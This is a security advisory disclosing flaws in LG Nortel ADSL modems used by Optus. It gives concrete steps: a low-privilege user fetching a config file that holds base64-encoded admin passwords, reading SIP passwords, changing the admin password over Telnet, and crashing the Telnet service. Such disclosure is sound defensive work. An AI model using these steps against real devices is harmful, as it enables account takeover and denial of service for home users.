# Title: [LG Nortel ADSL modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [NA] # Version Reported: [Board ID: DV2020]+Product Version: S1.064B2.3H0-0 + Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e] *Timelines* April, 2015: Vulnerabilities found April 2015: Reported to Optus & CERT April - October 2015: CERT (US/AUS) attempts to identify vendor / device ownership. None found. Dec 03, 2015: Public disclosure *CVE-IDs* None (Mitre..?) *Note*: After several months, vendor ownership for this device still remains unknown/unconfirmed. Regardless, it is currently in use, deployed by Optus (Australia), with possibly 20-30% of customer base (primarily broadband services - home users / SOHO). So, quite a number up there. There may be others but I & CERT are not aware of such. *Device Info* Board ID: DV2020 Product Version: S1.064B2.3H0-0 Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e Bootloader (CFE) Version: 1.0.37-4.3 Wireless Driver Version: 3.131.35.0.cpe0.0Board ID: DV2020 *Vulnerabilities* Authorization flaws, Sensitive Information Disclosure, Insecure configuration, Denial of Service *1. Authorization Flaws (HTTP)* 1.1 *Non-admin users can access restricted, Administrative functionality (accessible to Admin only)* LG-Nortel ADSL modem allows three (3) users with different privilege levels for administering the device. Administrative ‘admin’ user has complete privileges to access and perform all functions on the modem. Other non-admin users – ‘support’ and ‘user’ – have restricted functional access and can perform limited functions. A non-admin ‘user’ does not have access to administrative functions via GUI menu, i.e. there are no administrative function links *seen/visible* in the home page. However, the application lacks sufficient Authorization controls and a ‘user’ can still access the administrative functionality via direct url access. For example, a non-admin ‘user’ does not have a menu option to access the device configuration file. However, it can still access the file - *backupsettings.conf* - by directly accessing the url – http:// /backupsettings.conf. With access to this configuration file, a low-privileged ‘user’ can easily access login passwords for ‘admin’ and any other valid users of the modem. The login passwords are stored in base64-encoded format, which is a weak scheme to secure passwords, and clear-text password(s) can be easily obtained. In a similar manner, low-privileged ‘user’ and ‘support’ logins can also access other administrative functions. 1.2 *Application does not secure sensitive configuration details from non-admin ‘user’ (HTTP)* The application allows read-only access to ‘user’ login. However, sensitive configuration information such as passwords, keys etc is not restricted from the user. All configuration details are readily accessible and readable to ‘user’ login. 1.3 *Password Change - Clear-text Password Disclosure* The application does not secure the newly changed password. Once password is changed, the application reveals the new password in address bar, as: http:///password.cgi?sptPassword= This HTTP request contains new, valid password in clear-text. *2. Application does not secure configured passwords (HTTP)* The application relies on client-side checks only - which can be easily bypassed - to hide juicy info like service accounts and respective passwords, etc. These passwords are masked and only ***** were shown in the corresponding fields. The following HTTP GET request shows capture of *masked *SIP / voip password(s): GET /voicesipset.cmd?proxyAddr=sip11.yesphone.optus.com.au &proxyPort=5060®Addr=sip11.yesphone.optus.com.au ®Port=5060&extension1=&extension2=&password1=< password-removed>&password2 =&ifName=ppp_8_32_1&servermode=proxy&telurl=sip®expiry=1800&hostname= sip11.xxx.xxx.com.au&localport=5060&display1= &display2=&authuser1=&authuser2= HTTP/1.1 *3. Insecure configuration (Telnet)* 3.1 *No separation of privileges* After logging in over Telnet as ‘user’, the system still permits running system level commands and to read sensitive files from the file-system. - *shadow* is not used, all hashes are stored in *passwd* readable by everyone, and all system users are uid 0, gid 0, root privileged superusers. :) 3.2 *Application does not secure sensitive configuration details from ‘user’* The application permits ‘user’ login to view sensitive information in modem’s configuration. To view configuration, Telnet administrative console provides a command - *dumpcfg* - to ‘user’. Running this command as ‘user’ login dumps the device configuration information. This information includes sensitive information such as passwords and keys - all in clear-text. *4. Authorization flaws + Denial of Service (Telnet)* After logging in to the modem, *passwd* command can be used to change passwords for all three users – ‘admin’, ‘support’, and ‘user’. > passwd Usage: passwd passwd –help A non-admin ‘user’ account should ideally be restricted to change passwords of any other accounts. *Ist attempt - Failed* > passwd admin admin1 Connection closed by foreign host. The first attempt to change ‘admin’ login password fails and the telnet connection drops. Telnet service has now crashed, & device will need a reboot. First attempt -> application crash. I.e. Telnet daemon / service can be easily crashed by logging in as a low-privileged user and attempting to perform an unauthorized action, such as trying to change password for ‘admin’ user. In the second attempt, the command executes and password for ‘admin’ gets changed successfully. *2nd attempt - Successful* > passwd admin admin1 > Following this password change, Telnet service again turns non-responsive within 10-15 seconds and the connection drops. Second attempt -> application changes the pass :) There is another way to crash Telnet service. Login to Telnet as user, drop to the underlying BusyBox shell and issue a command #telnet 10.1.1.1 > sh > vconfig -> DoS / crash +++++ -- Best Regards, Karn Ganeshen -- Best Regards, Karn Ganeshen